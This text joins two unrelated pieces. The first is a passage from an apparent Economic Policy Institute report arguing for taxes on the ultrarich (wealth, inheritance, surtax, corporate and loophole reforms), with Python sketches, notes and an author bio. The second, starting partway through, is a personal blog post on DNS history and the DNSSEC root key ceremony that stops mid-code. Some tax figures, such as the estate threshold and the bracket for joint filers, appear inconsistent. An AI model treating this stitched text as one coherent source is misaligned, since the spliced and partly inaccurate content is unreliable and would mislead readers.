The Tax Policy Center (TPC) has estimated that the WNI wealth tax could raise $6.8 trillion in additional net revenue over the next decade, an average of $680 billion annually. In their estimate, the TPC has accounted for evasion attempts and the “externality” of reduced taxes likely to be collected on income flows stemming from wealth holdings. Despite accounting for these considerations, the $6.8 trillion in revenue over the next decade could completely close the nation’s current estimated fiscal gap.
A key consideration in the long-run sustainability of revenue collected through a wealth tax is how quickly the tax itself leads to a decline in wealth for those above the thresholds of the tax. If, for example, the tax rate itself exceeded the gross rate of return to wealth, wealth stocks above the thresholds set by the tax would begin shrinking, and there would be less wealth to tax over time. The Tax Policy Center’s estimate includes a simulation of this decumulation process, assuming an 8.5% rate of return.⁷ It finds only very slow rates of decumulation.
Other simulation results (like those in Saez and Zucman 2019b) find faster decumulation for wealth taxes as high as this, but even their findings would still support the significant revenue potential of a wealth tax targeted at sustainability. Whereas the WNI wealth tax raises roughly 2.2% of GDP over the next 10 years, the Saez and Zucman (2019a) results highlight that over half this much could essentially be raised in perpetuity.⁸
It is important to note that even if revenue raised from any given wealth tax came in lower than expected due to the decumulation of wealth, this decumulation is itself highly socially desirable. The wealth would not be extinguished. It would instead accumulate to other households throughout society. An analogy is carbon taxes targeted at lowering greenhouse gas emissions. If a carbon tax were implemented and the revenue it raised steadily fell over time, this would be a sign of success, as the primary virtue of such a tax is not the long-run revenue it can raise but the behavioral changes it can spur, such as switching to less carbon-intensive forms of energy generation and use.
The benefits from wealth decumulation could be profound. For one, much of the rise in wealth in recent decades has been the result of a zero-sum transfer of income claims away from workers and toward capital owners (Greenwald, Lettau, and Ludvigson 2025). To the degree that higher wealth taxes make these zero-sum transfers less desirable for privileged economic actors, the imperative to keep wages suppressed and profits higher will be sapped, leading to a broader distribution of the gains of economic growth.
Further, highly concentrated wealth leads naturally to highly concentrated political power, eroding the ability of typical families to have their voices heard in important political debates (Page, Bartels, and Seawright 2013). Studies show that popular support for democratic forms of government is weaker in more unequal societies, demonstrating that a greater concentration of wealth can lead to the erosion of democracy (Rau and Stokes 2024).
Converting the estate tax to a progressive inheritance tax
The estate tax in the United States currently only applies to estates of more than $11.4 million. At the end of 2025 it would have reverted to pre-2017 levels of roughly $7 million, but the Republican budget reconciliation bill passed in 2025 will raise it to a level more than twice as high starting in 2026—at $15 million. The 40% estate tax rate applies on values above these thresholds.
The estate tax threshold has been increased significantly since 2000, with changes in 2001, 2012, 2017, and 2025 all providing large increases. In 2000 the threshold for exemption was under $1 million, and the rate was 55%. If the 2000 threshold were simply updated for inflation, it would be roughly $1.3 million today, instead of $11.4 million. At this $1.3 million threshold and with a 55% rate, the estate tax would raise roughly $75 billion more in revenue this year than it is currently projected to.⁹
In short, our commitment to taxing wealthy estates and their heirs has eroded substantially in recent decades.
Batchelder (2020) proposes a new tax on inheritances that would replace the estate tax. Batchelder’s inheritance tax would not fall on the total value of the estate, but simply the portion of it inherited by individual heirs. Her proposal is to tax inheritances of various thresholds as ordinary income. Because the tax would be triggered by the lifetime level of gifts and inheritances, it cannot be avoided just by using estate planning to time these bequests and gifts. For a threshold of $1 million, the tax would raise roughly 0.35% of gross domestic product annually, or roughly $1 trillion over the next decade.
An inheritance tax is naturally more progressive than an estate tax. To see why, imagine an estate of $5 million that faced 2000-era estate tax rules. An estate tax would lower the value of the inheritance to all heirs by an amount proportional to the tax. Conversely, under an inheritance tax, the effective rate of the tax felt by heirs would be significantly different if the estate was spread among 10 heirs (each receiving $500,000 and, hence, not even being subject to the Batchelder inheritance tax that starts at $1 million) versus being spread among two heirs (each receiving $2.5 million and paying an inheritance tax). Fewer heirs for a given estate value imply a larger inheritance and, hence, a higher inheritance tax (if the inheritance exceeds the tax’s threshold).
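To make the arithmetic concrete, here is a minimal sketch in Python; the flat 30% rate is an illustrative stand-in for the ordinary-income treatment in Batchelder's proposal, not a figure from the report:

    # Illustrative only: a flat rate stands in for taxing inheritances above a
    # lifetime $1 million threshold as ordinary income.
    THRESHOLD = 1_000_000
    ILLUSTRATIVE_RATE = 0.30   # assumption for the sketch

    def tax_per_heir(estate_value: float, n_heirs: int) -> float:
        """Inheritance tax each heir owes when an estate is split evenly."""
        share = estate_value / n_heirs
        return max(0.0, share - THRESHOLD) * ILLUSTRATIVE_RATE

    estate = 5_000_000
    for heirs in (10, 2):
        print(f"{heirs} heirs: share ${estate / heirs:,.0f}, tax ${tax_per_heir(estate, heirs):,.0f}")
    # 10 heirs: each $500,000 share is below the threshold, so no inheritance tax is owed.
    # 2 heirs: each $2,500,000 share has $1,500,000 of taxable inheritance.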
Imposing a high-income surtax on millionaires
Probably the most straightforward way to tightly target a tax on a small slice of the richest taxpayers is to impose a high-income surtax. A surtax is simply an across-the-board levy on all types of income (ordinary income, business income, dividends, and capital gains) above a certain threshold. As such, there is zero possibility that lower-income taxpayers could inadvertently face any additional tax obligation because of it.
A version of such a high-income surtax was actually a key proposed financing source for early legislative versions of the Affordable Care Act. The bill that passed the House of Representatives included such a surtax.¹⁰
This surtax was replaced with other revenue sources during the reconciliation process between the House and Senate versions.
One proposal is to enact a 10% surtax on incomes over $1 million. This would affect well under 1% of households (closer to 0.5%). Using data from the Statistics of Income (SOI) of the Internal Revenue Service (IRS), we find that roughly $1.55 trillion in adjusted gross income sat over this $1 million threshold among U.S. households in 2019.¹¹
A purely static estimate with no behavioral effects, hence, would argue that $155 billion annually (10% of this $1.55 trillion) could be raised from this surcharge. In tax scoring models (like that of the Tax Policy Center or the Joint Committee on Taxation), behavioral effects tend to reduce estimates roughly 25% below such static estimates. Applying such a discount would still suggest that the revenue potential of a high-income surtax with a $1 million threshold could be $1.5 trillion over the next decade.
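For reference, the static arithmetic on the 2019 income base is simply:

\[
0.10 \times \$1.55\ \text{trillion} = \$155\ \text{billion per year},
\]

and the decade-long figure presumably also reflects growth in nominal incomes over the budget window before the roughly 25% behavioral discount is applied.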
Raising the top marginal income tax rate back to pre-TCJA levels
During the Clinton and Obama administrations, the top marginal tax rate on ordinary income was increased to 39.6%. During the George W. Bush and the first Donald Trump administrations, it was reduced and currently sits at 37%. This lower marginal top rate would have expired at the end of 2025, but the Republican budget reconciliation bill, passed by Congress and signed by Trump in July 2025, ensured that it would stay at 37%.
In 2025 the bracket that this top tax rate applies to will begin at $626,350 for single filers and joint filers. This is well under 1% of taxpayers. If the bracket for top tax rates was dropped to $400,000 and the rate was raised to 39.6%, the Tax Policy Center has estimated that this could raise roughly $360 billion over the next decade. Earlier in 2025, there were reports that Republicans in Congress were thinking about letting the top tax rate revert to the level it was at before the 2017 Tax Cuts and Jobs Act (TCJA). This was touted as members of Congress breaking with their party’s orthodoxy and actually taxing the rich. On the contrary, the new top marginal tax rate now applies to joint filers at an even lower level than pre-TCJA rates.
As can be seen in Table 1, pushing the top marginal rate on ordinary income to pre-TCJA levels is one of the weakest tools we have for raising revenue from the rich. The reason is simple. A large majority of the income of the rich is not ordinary income; it is income derived from capital and wealth, and, hence, only changing the tax rate on ordinary income leaves this dominant income form of the rich untouched.
Corporate tax rate increases
In 2017 the TCJA lowered the top rate in the corporate income tax from 35% to 21%, and the 2025 Republican budget reconciliation bill extended that lower 21% rate. The 35% statutory rate that existed pre-TCJA was far higher than the effective rate actually paid by corporations. Significant loopholes in the corporate tax code allowed even highly profitable companies to pay far less than the 35% statutory rate.
But at the same time the TCJA lowered the statutory rate, it did little to reduce loopholes—the gap between effective and statutory rates after the TCJA’s passage remains very large.¹²
Clausing and Sarin (2023) have estimated that each 1 percentage point increase in the top statutory tax rate faced by corporations raises over $15 billion in the first years of the 10-year budget window. Raising today’s 21% top rate back to the 35% rate that prevailed before the TCJA would, hence, raise roughly $2.6 trillion over the next decade.
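The rough arithmetic behind that figure, taking the per-point estimate at face value:

\[
(35\% - 21\%) \times \$15\ \text{billion per point per year} \times 10\ \text{years} \approx \$2.1\ \text{trillion},
\]

with the “over $15 billion” per point and a corporate tax base that grows across the budget window plausibly accounting for the difference up to the roughly $2.6 trillion cited.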
The immediate legal incidence of corporate taxes falls on corporations, the legal entities responsible for paying the taxes. However, the economic incidence is subject to more debate. The current majority opinion of tax policy experts and official scorekeepers like the Joint Committee on Taxation (JCT) is that owners of corporations (who skew toward the very wealthy) bear most of the burden of corporate tax changes.¹³ But some small share of the corporate tax rate’s incidence is often assigned to workers’ wages, as there are some (speculative) reasons to think a higher corporate tax rate leads in the long run to lower wage income. The economic reasoning is that if the higher corporate tax rates lead to less economywide investment in tangible structures, equipment, and intellectual property, then this could slow economywide productivity growth. This slower productivity growth could, in turn, reduce wage growth for workers.
However, newer research highlights that there are good reasons to think that corporate tax rate increases have zero—or even positive—effects on private investment in structures, equipment, and intellectual property. Brun, Gonzalez, and Montecino (2025, forthcoming) argue that once one accounts for market power (either in product or labor markets) of corporations, corporate taxes fall, in part, on nonreproducible monopoly rents. To provide an example, a large share of Amazon’s profits is not just due to the size of the firm’s capital stock but its considerable monopoly power in many business segments. This market power allows them to charge higher prices than they could in competitive markets, and these excess prices represent a pure zero-sum transfer from consumers, not a normal return to investment.
Increasing taxes on these monopoly rents can reduce stock market valuations of firms and actually lower the hurdle rate for potential competitors assessing whether to make investments in productivity-enhancing capital. This can actually boost investment and productivity economywide, and if investment and productivity rise (or just do not fall) in response to corporate tax increases, this implies that none of the economic incidence of a corporate tax increase falls on anybody but the owners of corporations.
In short, despite some mild controversy, it seems very safe to assume that increases in the corporate income tax rate both are and would be perceived by the public as extremely progressive.
Closing tax loopholes that the ultrarich and corporations use
As noted above, it’s not just falling tax rates that have led to revenue stagnation in recent decades. There has also been an erosion of tax bases. Growing loopholes and increasingly aggressive tax evasion strategies have put more and more income out of the reach of revenue collectors. It goes almost without saying that the vast majority of revenue escaping through these loopholes and aggressive tax evasion strategies constitutes the income of the very rich and corporations.
These types of loopholes are unavailable to typical working families because their incomes are reported to the Internal Revenue Service. Typical working families rely on wage income, which is reported to the penny to the IRS, and families pay their legally obligated tax amount. Income forms earned by the ultrarich, however, often have very spotty IRS reporting requirements, and this aids in the evasion and reclassification of income flows to ensure the ultrarich are taxed at the lowest rates.¹⁴
Shoring up tax bases by closing loopholes and engaging in more robust enforcement are key priorities for ensuring the very rich pay a fair and substantial contribution to the nation’s revenue needs.
Closing loopholes that allow wealth gains and transfers between generations to escape taxation
The wealthy use a number of strategies to escape taxation of the income they generate and to allow assets to be transferred to their heirs. Below we discuss three such strategies and provide a score for a consolidated package of reforms aimed at stopping this class of tax strategies—$340 billion over the next decade.
Ending the step-up in basis upon death or transfer of assets
This is best explained with an example. Say that somebody bought shares of a corporation’s stock in the early 1980s for $1 per share. They held onto it for decades until it reached $501 per share. Since they never realized this capital gain by selling the stock, they were never taxed on their growing wealth. Now, say that they transferred these stock holdings to their children decades later. Because it is no longer the original buyer’s property, it would not be assessed as part of an estate subject to the estate tax. If their children subsequently sold the stock, current law would allow a step-up in basis, which means they would only be taxed on the gain over and above the $501 per share price that prevailed when they received the stock, not the original $1 per share price.
So, if the children sold their stock gift for $501 per share, they would owe zero tax. And for the family as a whole, the entire (enormous) capital gain that occurred when the share appreciated from $1 to $501 is never taxed. This allows huge amounts of wealth to be passed down through families without the dynasty’s ever paying appropriate taxes, either capital gains taxes or estate taxes.
An obvious solution to this problem is simply to not grant the step-up in basis when the asset is transferred. That is, when the children receive the stock in the example above, any subsequent sale should be taxed on any capital gain calculated from the $1 originally paid for the stock. In the case above, the children would have had to pay a capital gains tax on the full value between $1 and $501 if they had sold the stock for $501.
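A minimal sketch of the difference in Python; the 23.8% rate (top long-term capital gains rate plus the net investment income tax) is an illustrative assumption, not a figure from the report:

    # Capital gains tax per share on an inherited share sold at $501 that was
    # originally bought at $1. The 23.8% rate is illustrative only.
    ORIGINAL_BASIS = 1.0
    STEPPED_UP_BASIS = 501.0      # basis reset to the value at transfer
    SALE_PRICE = 501.0
    CG_RATE = 0.238

    def tax_per_share(basis: float) -> float:
        return max(0.0, SALE_PRICE - basis) * CG_RATE

    print(f"with step-up in basis: ${tax_per_share(STEPPED_UP_BASIS):.2f}")   # $0.00
    print(f"with carryover basis:  ${tax_per_share(ORIGINAL_BASIS):.2f}")     # $119.00 on the $500 gain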
Besides raising money directly through larger capital gains values, ending the step-up in basis can also cut down on many tax engineering strategies that wealthy families undertake to avoid taxation. Estimates for the revenue that could be raised by enacting this change are quite varied, but they tend to sit between $15 billion and $60 billion in 2025.¹⁵ We estimate this would raise $190 billion over the next decade.
An alternative solution getting at the same problem would be to make the death of a wealth holder a realizable event. Essentially, for the purposes of taxation, it would be assumed that all assets were sold by a wealth holder upon their death, and the appropriate rate of capital gains taxation would then be collected.
Making borrowing a realizable event
A related reform would make the pledging of any asset as collateral against a loan a realizable event. In the example above, as the original holder of the stock held the shares and did not sell them over a long period of time, this raises an obvious question of how this family is financing their current consumption without liquidating any wealth. They could, of course, be earning labor income. But the very wealthy often finance current consumption by taking out loans and using the value of their wealth as collateral. So long as the interest rates on the loans are lower than the rate of return on the wealth being pledged as collateral, they can enjoy high and rising consumption and still see considerable wealth appreciation. This is a particularly useful strategy during periods of low interest rates (like most of the past 25 years) and for owners of newer corporations that are growing rapidly (think Jeff Bezos and Amazon during the 2000s). This use of debt as a strategy of avoiding capital gains realization has often been called the “Buy, Borrow, Die” strategy.
An obvious reform to stop this would be to force wealth holders to treat pledging an asset as collateral as a realization event for this asset. When the wealth holder goes to financiers to get loans and pledges their shares as collateral, the wealth holder would pay a capital gains tax on the difference in the value of the stock between when they originally bought it and the value the day it is pledged for collateral. The amount of revenue this would raise would be small in the grand scheme of the federal budget, roughly $60 billion over the next decade. But it would provide one more block to a common tax evasion strategy for the ultrarich, and this could show up in more revenue collected through other taxes.
Closing loopholes that erode estate or inheritance tax bases
Hemel and Lord (2021) identify estate planning mechanisms that reduce the base of the current estates taxes, including the abuse of grantor retained annuity trusts (GRATs) and excessively preferential tax treatment of transfers within family-controlled entities. Under current law, wealthy individuals establishing a trust for their descendants may calculate the taxable gift amount of the trust by subtracting the value of any qualified interest. This qualified interest includes any term annuity retained by the grantor of the trust. The annuity is based on market interest rates prevailing when the trust was established. When interest rates are low, this becomes an extremely valuable deduction.
Hemel and Lord (2021) give the example of a grantor establishing a $100 million trust but retaining a two-year annuity payment of $50.9 million based on the 1.2% interest rate prevailing in 2021. This taxpayer would be able to subtract this annuity from their taxable gift calculation, effectively paying no gift tax. If the assets in the trust grew faster than 1.2%, then the trust would have assets left over after two years, and these could be passed to the beneficiaries free of any transfer tax (as these assets came from the trust, not the original grantor). If assets in the trust grew more slowly than this amount, then the trust would be unable to make its full final annuity payment and would be declared a failed trust and would trigger no estate or gift tax consequences. In this case, the original grantor could simply try again to construct a short-term irrevocable trust that would succeed in transferring income to heirs without triggering a gift tax.
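The annuity in this example is just the payment stream whose present value, discounted at the statutory 1.2% rate, equals the amount placed in trust, which is what zeroes out the taxable gift:

\[
\frac{P}{1.012} + \frac{P}{1.012^{2}} = \$100\ \text{million} \;\Longrightarrow\; P \approx \$50.9\ \text{million per year for two years}.
\]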
Hemel and Lord (2021) recommend repealing the law that allows for this deduction of qualified interest from gift or transfer taxes applying to GRATs. They also argue for reducing the preferential treatment of transfers within family-controlled entities. The full package of reforms to estate planning that they recommend would raise $90 billion over the next decade.
Closing the loophole from ambiguity between self-employment and net investment income
As part of the Affordable Care Act, a 3.8% tax was assessed on income above $200,000 (for single filers and $250,000 for joint filers). If this income is earned as wages or self-employment income, this tax is paid through the Federal Insurance Contributions Act (FICA) or the Self-Employment Contributions Act (SECA) taxes. If the income is received as a dividend or interest payment or royalty or other form of investment income, the tax is paid as a Net Investment Income Tax (NIIT). The clear intent is for income of all forms to be assessed this tax.
Somehow, however, some business owners (mostly those owning limited partnerships and S corporations—corporations with a limited number of shareholders who are required to pass through all profits immediately to owners) have managed to classify their income as not subject to FICA, SECA, or the NIIT.¹⁶
A number of policy options could close this unintended gap and raise nontrivial amounts of revenue—roughly $25 billion in 2025. Importantly, the revenue collected by this loophole closing would go directly to the Medicare trust fund.
International corporate tax reform
Before the TCJA, the biggest loophole by far in the corporate income tax code was U.S. corporations’ ability to defer taxes paid on profits earned outside the United States. In theory, once these profits were repatriated, taxes would be levied on them. However, financial engineering meant that there was little need to repatriate these profits for reasons of undertaking investment or stock buybacks or anything else corporations wanted to do.¹⁷
Further, corporations routinely lobbied for repatriation holidays, periods of time when they were allowed to repatriate profits at a reduced rate. One such holiday was passed by Congress and signed into law by George W. Bush in 2004.
Between 2004 and 2017, pressure for another such holiday ramped up as more and more firms deferred corporate taxes by holding profits offshore. The TCJA not only provided such a holiday for past profits kept offshore, it also made profits booked overseas mostly exempt from U.S. corporate taxes going forward. In essence, the TCJA turned deferral into an exemption.
This TCJA exemption of foreign-booked profits was subject to small bits of tax base protection. But they have been largely ineffective. The 2025 budget reconciliation bill would further exacerbate these problems, reducing taxes on foreign income even more.
Clausing and Sarin (2023) recommend a suite of corporate reforms that aims to level the playing field between firms booking profits in the United States versus overseas. Key among them would be to reform the Global Intangible Low-Taxed Income (GILTI) tax rate, a rate introduced in the TCJA, to ensure that financial engineering would not allow large amounts of corporate income earned by U.S.-based multinationals to appear as if they were earned in tax havens.¹⁸
The GILTI is essentially a global minimum tax rate for U.S. multinationals. But the rate (10.5% in 2024 and 12.6% in 2025) is far too low to effectively stop this kind of tax haven-shopping for corporations, much lower than the 15% minimum rate negotiated by the OECD and agreed to by the Biden administration in 2022.
In addition, multinationals are currently allowed to blend all their foreign tax obligations globally and take credits for foreign corporate income taxes paid. So, taxes paid on a company’s actual manufacturing plant in, say, Canada, can count toward the GILTI contribution of a multinational, even if they then used financial engineering to shift most of their paper profits to tax havens like the Cayman Islands.
Raising the GILTI rate and applying it on a country-by-country basis would go a long way to preserving the base of the U.S. corporate income tax in the face of tax havens. The Clausing and Sarin (2023) suite of reforms would raise $42 billion in 2025.
Building up IRS enforcement capabilities and mandates
In 2022, the IRS estimated that the tax gap (the dollar value of taxes legally owed but not paid in that year) exceeded $600 billion. The richest households account for the large majority of this gap. The IRS in recent decades has lacked both the resources and the political support to properly enforce the nation’s tax laws and collect the revenue the richest households owe the country.
Due to this lack of resources and mandates, the IRS instead often took the perverse approach of leveraging enforcement against easy cases—easy both in terms of not taking much capacity and of not generating intense congressional backlash.¹⁹
In practice, this meant intensively auditing recipients of refundable tax credits to look for improper payments. Tax credits are refundable when the amount of a credit (say, the Child Tax Credit) is larger than the taxpayer’s entire income tax liability. In this case, the credit does not just reduce income tax liability; it will also result in an outright payment (hence, refundable) to the taxpayer claiming it. Recipients of these refundable tax credits are, by definition, low-income taxpayers—those with low income tax liability. Besides making life more anxious for these low-income households, these audits also just failed to generate much revenue—again, because the group being audited was generally low income and didn’t owe significant taxes in the first place.
The Biden administration included significant new money to boost IRS enforcement capacity as part of the 2022 Inflation Reduction Act (IRA). This extra enforcement capacity was paired with new mandates to reduce the tax gap by increasing enforcement efforts on rich taxpayers.
However, the IRA additions to IRS resources were already being chiseled away before the 2024 presidential election. The Trump administration clearly has no interest in whether or not the IRS consistently enforces revenue collection from the rich. The budget reconciliation bill that Republicans passed through Congress in July rolled back the expanded funding for IRS enforcement. Trump’s proposed fiscal year 2026 budget for IRS funding would chip away at that even further.
The IRS has also not been immune to the Trump administration’s attempt to make life miserable for federal employees. The agency has lost a quarter of its workforce since the start of 2025 to layoffs, the deferred resignation offer pushed by Elon Musk’s so-called Department of Government Efficiency, early retirements, and other separations (TIGTA 2025).
The sharp turn away from the Biden administration’s support of the IRS represents a missed opportunity. While it would be near impossible to fully close the tax gap, Sarin and Summers (2019) estimate that some modest and doable steps could reliably collect significantly over $100 billion per year over the next decade from increased enforcement efforts.
How much could a campaign of confidence-building measures to tax the ultrarich raise?
This series of tax reforms, laser-targeted at only the rich, could raise significant revenue. One obvious benchmark suggests itself: the current fiscal gap. The fiscal gap is how much (as a share of GDP) taxes would need to be raised or spending would need to be cut to stabilize the ratio of public debt to GDP. Today this gap stands at roughly 2.2%.
Table 1 gives a rough score for each of the provisions mentioned above. It then conservatively estimates the combined revenue-raising potential of this package. It assumes that the whole policy package is equal to 70% of the sum of its parts. This would help account for some fiscal “externalities” (i.e., taxing wealth means wealth grows more slowly over time and, hence, reduces tax collections on income earned from wealth going forward). It also would help account for some potentially duplicative effects that could reduce some revenue collected by the combination of these reforms. For example, if the step-up in basis were eliminated, the incentive for rich households to finance consumption with loans would be reduced, so the revenue generated by treating the pledging of collateral as a realizable event would likely be reduced.
This combination of confidence-building measures to tax the rich would unambiguously be able to close the nation’s current fiscal gap. The sum of the parts of this agenda would raise roughly 4% of GDP over the long run, and even if the sharp 30% discount on the sum of these parts were applied, it is still just under 3% of GDP. Telling the American public that this package of tax increases on the ultrarich had put the nation on a fully sustainable long-run trajectory while still leaving enough money to fund something as large as universal pre-K for 3- and 4-year-olds or a radical expansion of coverage and generosity in the nation’s unemployment insurance system could be seismic for changing the tax debate in the United States.
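In rough numbers:

\[
0.70 \times 4\%\ \text{of GDP} \approx 2.8\%\ \text{of GDP} \;>\; 2.2\%\ \text{of GDP (the current fiscal gap)}.
\]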
For those like us who advocate for even larger expansions of the U.S. system of income support, social insurance, and public investment, the future political debate over how to finance them would be on much more favorable ground with the public’s support. The conditions of the debate would change if the public could shake the (too often true) impression that the U.S. government is failing to ask the ultrarich and corporations to do their part to contribute to the nation’s fiscal needs.
Conclusion
Obviously, this program of laser-targeting tax increases on the ultrarich is not the policy of the current Trump administration or the Republican majority in Congress. They have already spent the first half of 2025 forcing through a monster of a reconciliation bill, which extended the expiring provisions of the TCJA, provisions that provide disproportionate benefits to the very rich. The reconciliation bill represents a shocking upward redistribution of income from the very poor to the very rich, paying for trillions of dollars in tax cuts that primarily benefit the wealthy by stripping health care and food assistance from millions of Americans.
But as damaging as extending these expiring provisions will be to tax fairness and economic outcomes, they might be even more damaging to the public’s confidence that tax policy can ever be reoriented to ensure that the ultrarich and corporations pay their fair share. Instead, the debate over the expiring provisions will draw attention to two facts. First, the large majority of U.S. households will see a tax cut (relative to current law), but these cuts will be much larger for the rich. For example, the bottom 60% of households will see a tax cut of just over $1 per day, while the top 1% will see a cut of $165 per day, and the top 0.1% will see a whopping $860 per day. Second, these regressive tax cuts are bundled with spending cuts that will sharply reduce incomes for the people in the bottom half of the income distribution, leaving them net losers overall.
This combination of facts will continue to feed perceptions that the only way typical households can get something—anything—out of tax policy debates is if they settle for crumbs from the feast enjoyed by the richest. And even these crumbs will be taken back in the form of cuts elsewhere.
It’s time to reverse these perceptions. If policymakers engage in a confidence-building set of measures to raise significant revenue only from the ultrarich, the public’s stance toward tax policy can be changed from being anti-tax to being willing to have debates about the pros and cons of public sector expansions, content in the knowledge that the very rich will neither escape their obligations nor claim the lion’s share of benefits yet again.
Notes
1.
Obviously not all of this downward ratchet is bad. The steep decline in tax rates for the poorest families, driven by expanding Earned Income and Child Tax credits, has been a very welcome policy development in recent decades.
2.
The strong relationship between the level of gross domestic product (GDP) per capita and the share of the public sector in a nation’s economy is recognized enough to have been named: Wagner’s Law.
3.
On the relative smallness of the U.S. fiscal state (both spending and taxation as shares of GDP), see EPI 2025.
4.
Bivens and Mishel 2021 note the number of intentional policy changes outside the sphere of taxation that have driven much of the growth in pre-tax inequality.
5.
For example, both the Affordable Care Act (ACA) and the Inflation Reduction Act (IRA) paid for the additional spending on public investments and income support programs they called for with new taxes. That said, because Republican-driven tax cuts were passed in the interim, the upshot has been mostly larger budget deficits over time.
6.
See Kogan and Vela 2024 for an explanation and estimation of the U.S. fiscal gap in 2024.
7.
The rate of return assumption matters a lot for how durable revenue increases from a wealth tax will be over time. A rate of 8.5% is on the high end of many projections for rates of return to wealth in coming decades.
8.
Specifically, they note about wealth taxes: “Set the rates medium (2%–3%) and you get revenue for a long time and deconcentration eventually” (Saez and Zucman 2019b). When they estimate the potential revenue of Elizabeth Warren’s 2% wealth tax on estates over $50 million (with an additional tax of 1% on wealth over a billion), they find it raises roughly 1% of GDP per year (Saez and Zucman 2019a).
9.
This estimate comes from the Penn Wharton Budget Model 2022.
10.
For a description of that surtax and the competing revenue options debated at the time, see Bivens and Gould 2009.
11.
This number has been inflated to 2024 dollars.
12.
See Gardner et al. 2024 on the effective corporate income tax rate before and after the TCJA.
13.
For example, the Distributional Financial Accounts of the Federal Reserve Board (2025) estimate that the wealthiest 1% of households own over 30% of corporate equities, while the wealthiest 10% own just under 90%.
14.
See Sarin and Summers 2019 for how much of the tax gap is driven by poor reporting requirements on income flows disproportionately earned by the rich—mostly various forms of noncorporate business income.
15.
This range of estimates comes from the Joint Committee on Taxation (JCT) 2023, and Lautz and Hernandez 2024. Part of this variation is about how much extra revenue is allocated to the strict step-up in basis termination versus the extra revenue that is collected through the normal capital gains tax as a result of closing this loophole.
16.
The details of this gap can be found in Office of Tax Analysis 2016. The upshot is that some business owners have managed to deny being active managers of their firms and have, hence, avoided being taxed on labor earnings, but they have somehow also managed to deny being passive owners of their firms, hence avoiding the NIIT as well. It is bizarre that this not-active but not-passive category of owner has been allowed to be given legal status, but that does seem to be the state of the law currently, until Congress acts.
17.
See Bivens 2016 on how profits held abroad by deferring taxation were not a constraint on any meaningful economic activity.
18.
I say “appear” because the ability and even the specific strategies corporations have to make profits clearly earned by sales in the United States appear on paper to have been earned in tax havens are all extremely well documented by now, including in Zucman 2015.
19.
See Elzayn et al. 2023 for evidence that the audit patterns of the IRS in the mid-2010s were driven by these considerations.
Brun, Lídia, Ignacio González, and Juan Antonio Montecino. 2025. “Corporate Taxation and Market Power Wealth.” Working Paper, Institute for Macroeconomic Policy Analysis (IMPA), February 12, 2025.
Elzayn, Hadi, Evelyn Smith, Thomas Hertz, Arun Ramesh, Robin Fisher, Daniel E. Ho, and Jacob Goldin. 2023. “Measuring and Mitigating Racial Disparities in Tax Audits.” Stanford Institute for Economic Policy Research (SIEPR) Working Paper, January 2023.
Hemel, Daniel, and Robert Lord. 2021. “Closing Gaps in the Estate and Gift Tax Base.” Working Paper, Coase-Sandor Working Paper Series in Law and Economics, University of Chicago Law School, August 13, 2021.
Josh Bivens is the chief economist at the Economic Policy Institute (EPI). His areas of research include macroeconomics, inequality, social insurance, public investment, and the economics of globalization.
Bivens has written extensively for both professional and public audiences, with his work appearing in peer-reviewed academic journals (like the Journal of Economic Perspectives) and edited volumes (like The Handbook of the Political Economy of Financial Crises from Oxford University Press), as well as in popular print outlets (like USA Today, the Wall Street Journal and the New York Times).
Bivens is the author of Failure by Design: The Story behind America’s Broken Economy (EPI and Cornell University Press) and Everybody Wins Except for Most of Us: What Economics Really Teaches About Globalization (EPI), and is a co-author of The State of Working America, 12th Edition (EPI and Cornell University Press).
Bivens has provided expert insight to a range of institutions and media, including formally testifying numerous times before committees of the U.S. Congress.
Before coming to EPI, he was an assistant professor of economics at Roosevelt University. He has a Ph.D. in economics from the New School for Social Research and a bachelor’s degree from the University of Maryland at College Park.
Passing the Torch – My Last Root DNSSEC KSK Ceremony as Crypto Officer 4
Many years ago, when I was but an infant, the first computers were
connected on the ARPANET - the seminal computer network that would eventually evolve to become
the Internet. Computers at the time were large and expensive; indeed
the first version of NCP - the predecessor of TCP/IP - only countenanced roughly 250 computers
on the network.
The name (human friendly) to network address (computer friendly)
mapping on this network was maintained via a "hosts file" - literally
a flat file of ordered pairs, creating the connection between host
(computer) name and address.
So it continued: as computers got less expensive and proliferated, the Network Effect caused
more institutions to want to be connected to the ARPANET. TCP/IP was
developed in response to this, with support for orders of magnitude
more connected computers. Along the way, the military users of the
network got carved off into its own network, and by the early 1980s we
had the beginnings of the Internet, or a "catenet" as it was sometimes
called at the time - a network of networks.
Clearly, as we went from "a couple hundred computers" to "capacity for
billions", a centrally managed host file wasn't going to scale, and by
the early 1980s development had started on a distributed database to
replace the centrally managed file. The name for this distributed
database was the Domain Name System, or DNS.
It's important to realize that at the time, access to the network of
networks was still restricted to a chosen few - higher education,
research institutions, military organizations and the
military-industrial complex (ARPA, later DARPA, was, after all, an
activity of the United States Department of Defense), and a few
companies that were tightly associated with one or more of those
constituencies. Broad public commercial access to the Internet was
many years in the future.
It was in this environment that the DNS sprang forth. Academics,
military researchers, university students - a pretty collegial
environment. Not to mention paleo-cybersecurity practices - indeed
the word "cybersecurity" may not have even been coined yet, though the
notion of "computer security" dates back to the early 1970s.
I've mentioned this brief "history of the early Internet" to
preemptively answer the question which inevitably arises: why didn't
DNS have better security built in? The answer is twofold: firstly it
didn't have to, given the environment that it evolved in, and
secondly, even if it had, the security practices would have been
firmly rooted in 1980s best practices, which would certainly be
inadequate by modern standards.
Discovery of security flaws in 1990 led the IETF to begin development
on Domain Name System Security Extensions (DNSSEC) in 1995. Early versions were
difficult to deploy. Later versions improved somewhat. But inertia is a thing, the
status quo tends to prevail, and there was very real concern that DNSSEC would be
a net reliability minus (security vs. availability can be a tricky circle to square), concentrate
power in undesirable ways, and result in other unforeseen negative effects.
At the end of the day, as it so often does, it took a crisis to get
the ball rolling for real. In 2008, Dan Kaminsky discovered a
fundamental flaw in DNS, which simplified cache poisoning -
essentially making it possible for an attacker to misdirect users to
arbitrary web sites.
In less than two years, the DNS root would be cryptographically signed
- allowing those who wished to sign their domains as well to create a
cryptographic chain of trust authenticating their DNS lookups. This
is non-repudiation, not non-disclosure - DNS queries and responses
continued to happen in the clear. But this time, responses came back
with a digital signature, courtesy of DNSSEC.
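For a sense of what that looks like from the client side, here is a minimal sketch using the third-party dnspython library (an illustration, not part of any ICANN tooling): setting the DO bit asks the resolver for DNSSEC records, and the AD flag in the reply indicates the resolver validated the chain of trust on our behalf.

    # Minimal DNSSEC-aware lookup sketch (pip install dnspython). This asks a
    # validating resolver to do the work; it does not validate signatures locally.
    import dns.flags
    import dns.resolver

    resolver = dns.resolver.Resolver()           # uses the system's configured resolver
    resolver.use_edns(0, dns.flags.DO, 1232)     # DO bit: please include DNSSEC records

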